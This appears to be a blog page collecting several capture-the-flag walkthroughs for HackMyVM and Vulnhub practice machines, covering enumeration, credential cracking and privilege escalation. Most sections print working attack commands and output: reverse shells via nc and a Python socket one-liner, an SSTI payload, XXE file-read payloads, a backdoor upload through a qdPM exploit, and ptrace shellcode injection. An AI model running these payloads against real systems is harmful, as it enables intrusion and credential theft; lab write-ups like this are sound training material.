HackMyVm Drippingblues Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Drippingblues

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100                
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rwxrwxrwx    1 0        0             471 Sep 19 18:57 respectmydrip.zip [NSE: writeable]
 | ftp-syst:                                                                  
 |   STAT:                                                                    
 | FTP server status:                                                          
 |      Connected to ::ffff:192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII                                                                                                                                          
 |      No session bandwidth limit
 |      Session timeout in seconds is 300                      
 |      Control connection is plain text                        
 |      Data connections will be plain text                      
 |      At session startup, client count was 4      
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
 |   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
 |_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 2 disallowed entries  
 |_/dripisreal.txt /etc/dripispowerful.html
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.php (Status: 200) [Size: 138]
/robots.txt (Status: 200) [Size: 78]

Check index.php, get 2 user names.

```bash
 ~ curl http://192.168.56.100/index.php  
 <html>
 <body>
 driftingblues is hacked again so it's now called drippingblues. :D hahaha
 <br>
 by
 <br>
 travisscott & thugger
 </body>
 </html>⏎              

Check robots.txt, get a text file and a local html file.

~ curl http://192.168.56.100/robots.txt
 User-agent: *
 Disallow: /dripisreal.txt
 Disallow: /etc/dripispowerful.html

Login ftp anonymous, download respectmydrip.zip. Bruteforce the zip pass.

 ~ fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt respectmydrip.zip
 PASSWORD FOUND!!!!: pw == 072528035

Unzip respectmydrip.zip, in respectmydrip.txt, get hint.

 ~ cat respectmydrip.txt
 just focus on "drip"⏎  

Fuzz index.php with param drip=/etc/dripispowerful.html. Get a password string.

 ~ curl 'http://192.168.56.100/index.php?drip=/etc/dripispowerful.html'    
 <!DOCTYPE html>
 <html>
 ...
 </style>
 password is:
 imdrippinbiatch
 ...

Try username thugger we got from index.php. Successfully login ssh.

```bash
~ ssh thugger@192.168.56.100 ...
thugger@drippingblues:~$ id
uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)

The root step is use the Ubuntu Polkit Vulnerability.

Check the POC here.

https://github.com/Almorabea/Polkit-exploit

 ```bash
root@drippingblues:/home/thugger# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 drippingblues

HackMyVm Demons Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Demons

Find IP of the machine.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24                            
 ...
 192.168.56.218  08:00:27:71:4c:b6       PCS Systemtechnik GmbH

继续阅读 →

HackMyVm Dance Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Dance

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 ...
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 ...
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found /music.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 121]
 /music                (Status: 301) [Size: 169] [--> http://192.168.56.100/music/]

Enter /music in web browser, check information, it's a web app called musicco.

image-20210914101829803.png

Search exploit of musicco.

```bash
~ searchsploit musicco

Exploit Title | Path

Musicco 2.0.0 - Arbitrary Directory Download | php/webapps/45830.txt

Through the exploit, we can download the whole html dir as a zip file.

 ```bash
~ wget 'http://192.168.56.100/music/?getAlbum&parent=../../&album=var' -O var.zip

Unzip var.zip, check /music/config.php, get some credentials.

```bash
~ cat config.php
<?php
$_CONFIG['saveConfig'] = '';
$_CONFIG['users'] = array(
array('admin', 'admin', 'true'),
array('guest', 'guest', 'false'),
array('aria', 'seraphim', 'false'),
array('alice', 'rememberyou', 'false'),
array('ava', 'password', 'false'),
array('alba', 'thehostof', 'false'),
);
$_CONFIG['lang'] = 'en';
$_CONFIG['musicRoot'] = 'music';
$_CONFIG['coverFileName'] = 'folder';
$_CONFIG['coverExtension'] = '.png';
$_CONFIG['loadLyricsFromFile'] = 'on';
$_CONFIG['downLoadMissingCovers'] = 'on';
$_CONFIG['searchEngine'] = '';
$_CONFIG['imageSearchEngine'] = '';
?>

We can login ssh as user aria.

 ```bash
~ ssh aria@192.168.56.100
 aria@dance:~$ id
 uid=1000(aria) gid=1000(aria) groups=1000(aria),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Another user is alba, but it's nologin.

```bash
aria@dance:~$ cat /etc/passwd|grep alba
alba:x:1001:1001:,,,:/home/alba:/usr/sbin/nologin

So we need to set the login shell for alba, then escalate to user alba.

```bash
 aria@dance:~$ su -s /bin/bash alba
 Password:
 alba@dance:/home/aria$ id
 uid=1001(alba) gid=1001(alba) groups=1001(alba)

Check sudo -l.

alba@dance:/home/aria$ sudo -l
 Matching Defaults entries for alba on dance:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User alba may run the following commands on dance:
     (root) NOPASSWD: /usr/bin/espeak

The last step is to use espeak to read (or listen to) /root/root.txt.

```bash
alba@dance:/home/aria$ sudo /usr/bin/espeak -f /root/root.txt -q -X
Translate 'rootflag'

 ...

Vulnhub DoubleTrouble Walkthrough

https://www.vulnhub.com/entry/doubletrouble-1,743/

Scan port 80.

~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
 403,404,500 --wildcard   -o 80.log
 ===============================================================
 /uploads              (Status: 301) [Size: 318] [--> http://192.168.56.100/uploads/]
 /images               (Status: 301) [Size: 317] [--> http://192.168.56.100/images/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /template             (Status: 301) [Size: 319] [--> http://192.168.56.100/template/]
 /core                 (Status: 301) [Size: 315] [--> http://192.168.56.100/core/]
 /install              (Status: 301) [Size: 318] [--> http://192.168.56.100/install/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
 /index.php            (Status: 200) [Size: 5814]
 /check.php            (Status: 200) [Size: 0]
 /sf                   (Status: 301) [Size: 313] [--> http://192.168.56.100/sf/]
 /readme.txt           (Status: 200) [Size: 470]
 /robots.txt           (Status: 200) [Size: 26]
 /secret               (Status: 301) [Size: 317] [--> http://192.168.56.100/secret/]    

<!--more-->

In /secret, download doubletrouble.jpg, get password and creds.txt.

 ~ stegseek --crack -sf doubletrouble.jpg        
 StegSeek version 0.5
 Progress: 2.00% (2794835 bytes)
 [i] --> Found passphrase: "92camaro"
 [i] Original filename: "creds.txt"
 [i] Extracting to "doubletrouble.jpg.out"                    
 ~ mv doubletrouble.jpg.out creds.txt                
 ~ cat creds.txt                                                                                          otisrush@localhost.com
 otis666⏎                              

Search exploit of qdPM.

```bash
~ searchsploit qdPM

Exploit Title | Path

...
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50175.py ...

Use POC to upload backdoor.

 ```bash
~ python3 50175.py --host 'http://192.168.56.100/' -u otisrush@localhost.com -p otis666                                              python3-0 | 1 [14:53:09]

 You are not able to use the designated admin account because they do not have a myAccount page.

 Backdoor uploaded at - > http://192.168.56.100//uploads/users/?cmd=whoami

Check if backdoor works OK.

 ~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=whoami'
 <pre>www-data
 </pre>⏎    

Get reverse shell.

```bash
~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash';
────────────────────────────────────────────────────────────────────────────────────────────────────────

~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:53330.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$

Check sudo -l.

```bash
 www-data@doubletrouble:/home$ ls -la
 ls -la
 total 8
 drwxr-xr-x  2 root root 4096 Sep 11 13:51 .
 drwxr-xr-x 18 root root 4096 Dec 17  2020 ..
 www-data@doubletrouble:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on doubletrouble:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on doubletrouble:
     (ALL : ALL) NOPASSWD: /usr/bin/awk

Get root.

www-data@doubletrouble:/home$ sudo awk 'BEGIN {system("/bin/sh")}'
 sudo awk 'BEGIN {system("/bin/sh")}'
 # id;hostname
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 doubletrouble

Vulnhub Deathnote: 1 Walkthrough

https://www.vulnhub.com/entry/deathnote-1,739/](https://www.vulnhub.com/entry/deathnote-1,739/

Easy one, key steps here.

Get notes.txt and user.txt from http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/.

Hydra ssh credentials with these 2 files.

~ hydra -L user.txt -P notes.txt -e nsr 192.168.56.100  ssh -t20 -F                                    
 ...
 [22][ssh] host: 192.168.56.100   login: l   password: death4me                                           ...

In /opt found hint and case.wav.

```bash
l@deathnote:/opt/L/fake-notebook-rule$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Aug 29 11:26 .
drwxr-xr-x 4 root root 4096 Aug 29 11:12 ..
-rw-r--r-- 1 root root 84 Aug 29 11:25 case.wav
-rw-r--r-- 1 root root 15 Aug 29 11:26 hint

Use cyberchef-->from hex, decode content of case.wav, get cGFzc3dkIDoga2lyYWlzZXZpbCA=.

Decode base64, get password of kira.

Get root

 ```bash
kira@deathnote:~$ sudo -l
 Matching Defaults entries for kira on deathnote:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User kira may run the following commands on deathnote:
     (ALL : ALL) ALL
 kira@deathnote:~$ sudo su root
 root@deathnote:/home/kira# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 deathnote
 root@deathnote:/home/kira# 

VlunHub Hacker kid: 1.0.1 Walkthrough

https://www.vulnhub.com/entry/hacker-kid-101,719/

Very good machine, learn some new stuff.

Scan ports, port 53 is interesting.

nmap -sV -sC -p- 192.168.33.144  -oN ports.log        
 ...
 PORT     STATE SERVICE VERSION
 53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
 | dns-nsid:
 |_  bind.version: 9.16.1-Ubuntu
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Notorious Kid : A Hacker
 9999/tcp open  http    Tornado httpd 6.1
 |_http-server-header: TornadoServer/6.1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

```bash
~ gobuster dir -u http://192.168.33.144 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
403,404,500 --wildcard -o 80.log
...

/images (Status: 301) [Size: 317] [--> http://192.168.33.144/images/]
/index.php (Status: 200) [Size: 3597]
/css (Status: 301) [Size: 314] [--> http://192.168.33.144/css/]
/form.html (Status: 200) [Size: 10219]
/app.html (Status: 200) [Size: 8048]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.144/javascript/]

Found hints in index.php source code.

```bash
 <div class="container py-5">
   <h1>Thanks</h1>

  TO DO: Use a GET parameter page_no  to view pages.
 --></code></pre>
<p>Fuzz index.php with page_no.</p>
<pre><code class="language-bash"> ~ seq 1 100 > dic.txt
 ~ wfuzz -u 'http://192.168.33.144/index.php?page_no=FUZZ'    -w dic.txt --hh 3654
 ...
 =====================================================================                                  
 000000021:   200        116 L    310 W      3849 Ch     "21"</code></pre>
<p>Get more info with page_no=21.</p>
<pre><code class="language-bash"> ~ curl 'http://192.168.33.144/index.php?page_no=21'
 <center>
         <font color="red">

 Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many homes...one such home..one such home for me : hackers.blackhat.local<br>
 <font color="red">
 </center></code></pre>
<p>Dig another domain name, write it into /etc/hosts.</p>
<pre><code class="language-bash">~ dig @192.168.33.144 hackers.blackhat.local                                                             ...
 ;; AUTHORITY SECTION:
 blackhat.local.         3600    IN      SOA     blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600
 ...</code></pre>
<p>Visit hackerkid.blackhat.local, use XXE (XML External Entity) Injection.</p>
<p>```bash
~ curl '<a href="http://hackerkid.blackhat.local/process.php&#039">http://hackerkid.blackhat.local/process.php&#039</a>;     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'file:///etc/passwd\'>
]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
...
saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
bind:x:126:133::/var/cache/bind:/usr/sbin/nologin</p>
<pre><code>
Read bachrc file with base64.

 ```bash
~ curl 'http://hackerkid.blackhat.local/process.php'     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'php://filter/convert.base64-encode/resource=/home/saket/.bashrc\'>]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
 ...
 Sorry, IyB+Ly5iYXNocmM6IGV4ZWN1dGVkIGJ5IGJhc2goMSkgZm9yIG5vbi1sb2dpbiBzaGVsbHMuCiMgc2VlIC91c3Ivc2hhcmUvZG9jL2Jhc...
 IFBhc3N3b3JkIGZvciBydW5uaW5nIHB5dGhvbiBhcHAKdXNlcm5hbWU9ImFkbWluIgpwYXNzd29yZD0iU2FrZXQhIyQlQCEhIgo= is not available !!!</code></pre>
<p>Decode base64. Get password of port 9999, but should login with name "saket".</p>
<pre><code class="language-bash"> #Setting Password for running python app
 username="admin"
 password="Saket!#$%@!!"</code></pre>
<p>Login port 9999.</p>
<p>image-20210906141418214.png</p>
<p>Input param "name", get output in webpage.</p>
<p>image-20210906141454486.png</p>
<p>Enter shell code, get reverse shell through nc, then spawn a new full shell.</p>
<p>```bash
{%import os%}{{os.system("nc 192.168.33.128 1234|/bin/bash|nc 192.168.33.128 2234")}}</p>
<pre><code>
Getcap enum.

 ```bash
saket@ubuntu:~$ /sbin/getcap / -r 2>/dev/null
 /sbin/getcap / -r 2>/dev/null
 /usr/bin/python2.7 = cap_sys_ptrace+ep
 /usr/bin/traceroute6.iputils = cap_net_raw+ep
 /usr/bin/ping = cap_net_raw+ep
 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
 /usr/bin/mtr-packet = cap_net_raw+ep
 ...</code></pre>
<blockquote>
<p>Reference: <a href="https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc">https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc</a></p>
</blockquote>
<p>Download the POC and upload to server.</p>
<pre><code class="language-bash"> wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py</code></pre>
<p>Choose a root process to be injected.</p>
<pre><code class="language-bash"> saket@ubuntu:~$ ps aux|grep root
 ...
 root         935  0.0  0.4 199776 19968 ?        Ss   12:54   0:00 /usr/sbin/apache2 -k start
 ...</code></pre>
<p>Run the POC, then check port.</p>
<p>```bash
saket@ubuntu:~$ python2.7 inject.py 935
python2.7 inject.py 935
Instruction Pointer: 0x7fd118b560daL
Injecting Shellcode at: 0x7fd118b560daL
Shellcode Injected!!
Final Instruction Pointer: 0x7fd118b560dcL
saket@ubuntu:~$ ss -tnlp
ss -tnlp
State     Recv-Q    Send-Q        Local Address:Port       Peer Address:Port    Process                 ...
LISTEN    0         0                   0.0.0.0:5600            0.0.0.0:*                                ...</p>
<pre><code>
Connect port 5600 and get root shell.

```bash
 ~ nc 192.168.33.144 5600              
 id
 uid=0(root) gid=0(root) groups=0(root)

HackMyVm Warez Simple Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Warez

Two key steps.

First step, use Aria2 WebUI to download authorzied_keys into /home/carolina/.ssh, then we can login ssh as user carolina.

image-20210901220643988.png

Second step, use rtorrent to download authorzied_keys again into /root/.ssh.

 carolina@warez:~$ tail .rtorrent.rc
 # SCGI Connectivity (for alternative rtorrent interfaces, XMLRPC)
 # Use a IP socket with scgi_port, or a Unix socket with scgi_local.
 # schedule can be used to set permissions on the unix socket.
 #
 #network.scgi.open_port = "127.0.0.1:5000"
 #network.scgi.open_local = (cat,(session.path),/rpc.sock)
 #schedule2 = socket_chmod, 0, 0, "execute.nothrow=chmod,770,(cat,(session.path),/rpc.sock)"
 execute.throw = mkdir,/root/.ssh
 execute.throw = wget,http://192.168.56.150/authorized_keys,-O,/root/.ssh/authorized_keys

Vulnhub ContainMe: 1 Walkthrough

https://www.vulnhub.com/entry/containme-1,729/

Interesting machine. Need ELF analysis, multi-layer port forward, etc. Learned new things.

Scan ports.

 ~ nmap -sV -sC -p- 192.168.33.142  -oN ports.log[[195/235]
 ...
 22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
 |_  256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
 80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
 |_http-server-header: Apache/2.4.29 (Ubuntu)
 |_http-title: Apache2 Ubuntu Default Page: It works
 2222/tcp open  EtherNetIP-1?
 |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
 8022/tcp open  ssh           OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   2048 dc:ae:ea:27:3f:ab:10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
 |   256 67:29:75:04:74:1b:83:d3:c8:de:6d:65:fe:e6:07:35 (ECDSA)
 |_  256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~ gobuster dir -u http://192.168.33.142 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /info.php             (Status: 200) [Size: 68948]
 /index.html           (Status: 200) [Size: 10918]
 /index.php            (Status: 200) [Size: 329]  

Check index.php, it will list files of current dir.

 ~ curl http://192.168.33.142/index.php
 <html>
 <body>
         <pre>
         total 28K
 drwxr-xr-x 2 root root 4.0K Jul 16 11:40 .
 drwxr-xr-x 3 root root 4.0K Jul 15 17:11 ..
 -rw-r--r-- 1 root root  11K Jul 15 17:11 index.html
 -rw-r--r-- 1 root root  154 Jul 16 11:40 index.php
 -rw-r--r-- 1 root root   20 Jul 15 17:27 info.php
         <pre>

 <!--  where is the path ?  -->

 </body>
 </html>

Maybe index.php has LFI. Fuzz the param name.

~ wfuzz -u 'http://192.168.33.142/index.php?FUZZ=id'  --hh 329  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000013516:   200        10 L     13 W       79 Ch       "path"  

It has code injection.

```bash
~ curl 'http://192.168.33.142/index.php?path=;id'; ...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
...

Get reverse shell as www-data.

 ```bash
~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.142.
 Ncat: Connection from 192.168.33.142:60146.
 bash: cannot set terminal process group (242): Inappropriate ioctl for device
 bash: no job control in this shell
 www-data@host1:/var/www/html$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 www-data@host1:/var/www/html$
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ curl 'http://192.168.33.142/index.php?path=;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'

Now we have reverse shell of host1. In /home/mike, found interesting file named 1cryptupx.

```bash
www-data@host1:/home/mike$ ls -la
ls -la
total 384
drwxr-xr-x 5 mike mike 4096 Jul 30 04:36 .
drwxr-xr-x 3 root root 4096 Jul 19 15:03 ..
lrwxrwxrwx 1 root mike 9 Jul 19 15:06 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 mike mike 3771 Apr 4 2018 .bashrc
drwx------ 2 mike mike 4096 Jul 30 04:36 .cache
drwx------ 3 mike mike 4096 Jul 30 04:36 .gnupg
-rw-r--r-- 1 mike mike 807 Apr 4 2018 .profile
drwx------ 2 mike mike 4096 Jul 19 15:27 .ssh
-rwxr-xr-x 1 mike mike 358668 Jul 30 04:39 1cryptupx

Run 1cryptupx with any string param, showed decompress error.

 ```bash
www-data@host1:/home/mike$ ./1cryptupx string
 ./1cryptupx string
 ░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
 ██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
 ██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
 ██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
 ╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
 ░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

 Unable to decompress.

We need to download 1cryptupx to local kali. Here I use xxd to display hex data of the file.

```bash
curl 'http://192.168.33.142/index.php?path=;xxd%20-ps%20/home/mike/1cryptupx';
...
0f7fb80039b93030919edc6e21ff1f407f40342f624343421f9e7f281839
f2788f787f88ffec8617bba37f0090ff807fb9d845c1d87fac7fe04d143c
39e0101a7fb292b393a1ffab9b7f680739f24226c468b268a2e1b8281808
ffd27fd19edc6e1f807f70e098ff3b902f36d77f604b4e28ff2d76c145eb
7f302f812d98867f277f0fa6db548103af977ff4ff9224098b00002a49ff
000000005550582100000000555058210d1608096e14e678c6222cc76007
000042020000d0a90d00491b00a2f4000000
<pre>

<!-- where is the path ? -->

</body>
</html>

Then restore 1cryptupx  through cyberchef.

image-20210901141024237.png

Use upx to decompress.

 ```bash
~ upx -d -o dec 1cryptupx                                                                                                                                                                                               fish-0 | 0 [14:11:26]
                        Ultimate Packer for eXecutables
                           Copyright (C) 1996 - 2020
 UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

         File size         Ratio      Format      Name
    --------------------   ------   -----------   -----------
     895440 <-    358668   40.05%   linux/amd64   dec

 Unpacked 1 file.

Decompile the file in ghidra, found key string "Unable to decompress", locate the key function.

 undefined8 FUN_004016ad(int param_1,long param_2)

 {
   ...
   if (param_1 == 2) {
     uVar3 = *(undefined8 *)(param_2 + 8);
     uStack1056 = 0x401721;
     iVar1 = thunk_FUN_004010d6(uVar3,&DAT_004955cb);
     pcVar4 = "\nYou wish!";
     if (iVar1 != 0) {
       uStack1056 = 0x40173a;
       thunk_FUN_0040101e(auStack1048,uVar3);
       uStack1056 = 0x401742;
       lVar2 = thunk_FUN_004010d6(auStack1048);
       if (auStack1048[lVar2 + -1] == '\n') {
         auStack1048[lVar2 + -1] = 0;
       }
       uStack1056 = 0x40175d;
       uVar3 = FUN_00401d90(auStack1048,"$2b$15$TXl.yuAF49958vsn1dqPfe");
       uStack1056 = 0x40176c;
       iVar1 = thunk_FUN_004010d6(uVar3,
                                  "$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6");
       if (iVar1 == 0) {
         uStack1056 = 0x40177b;
         FUN_00453290(0,0,0);
         uStack1056 = 0x401787;
         FUN_0041ddc0("/bin/bash");
         return 0;
       }
       pcVar4 = "Unable to decompress.";
     }
     uStack1056 = 0x401795;
     FUN_0041eaa0(pcVar4);
   }
   return 0;
 }

In this function, we get an hash string. It means if we input the correct password, the function will call "/bin/bash" as root.

We save the hash string into hash.txt.

 ~ echo '$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6' > hash.txt

Use john to brute force the hash.

 ~ john --wordlist=/usr/share/wordlists/seclists/Passwords/Common-Credentials/10k-most-common.txt  hash.txt                                                                                      vim-0 | 0 [20:32:26]
 Using default input encoding: UTF-8
 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
 Cost 1 (iteration count) is 32768 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 mike             (?)
 1g 0:00:02:03 DONE (2021-08-31 20:36) 0.008120g/s 1.461p/s 1.461c/s 1.461C/s internet..john
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed

Now we get the password of the file.

Search files with SUID.

 www-data@host1:/home/mike$ find / -perm -u=s 2>/dev/null
 find / -perm -u=s 2>/dev/null
 /usr/share/man/zh_TW/crypt
 /usr/bin/newuidmap
 /usr/bin/newgidmap
 ...

Notice the first file, run crypt with password, we get root on host1.

```bash
www-data@host1:/home/mike$ /usr/share/man/zh_TW/crypt mike
/usr/share/man/zh_TW/crypt mike
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
root@host1:/home/mike# id
uid=0(root) gid=33(www-data) groups=33(www-data)

Check local ips, notice an interesting IP in another network range.

```bash
 root@host1:/home/mike# ifconfig
 ...
 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
         inet 172.16.20.2  netmask 255.255.255.0  broadcast 172.16.20.255
         inet6 fe80::216:3eff:fe46:6b29  prefixlen 64  scopeid 0x20<link>
 ...

Scan for live hosts on this ip range with bash command, found live host 172.16.20.6.

 root@host1:~# for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5  >/dev/null && echo "172.16.20.$i" &) ;done
 172.16.20.2
 172.16.20.6

Scan for open ports of host2.

 for port in {1..65535}; do
   echo >/dev/tcp/172.16.20.6/$port &&
     echo "port $port is open"
 done 2>/dev/null |grep open
 ...
 port 22 is open

Here is a little tricky. We can login host2 with user name mike and id_rsa of mike on host1.

 root@host1:/# cd /home/mike/.ssh/
 root@host1:/home/mike/.ssh# ssh mike@172.16.20.6 -i id_rsa

 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

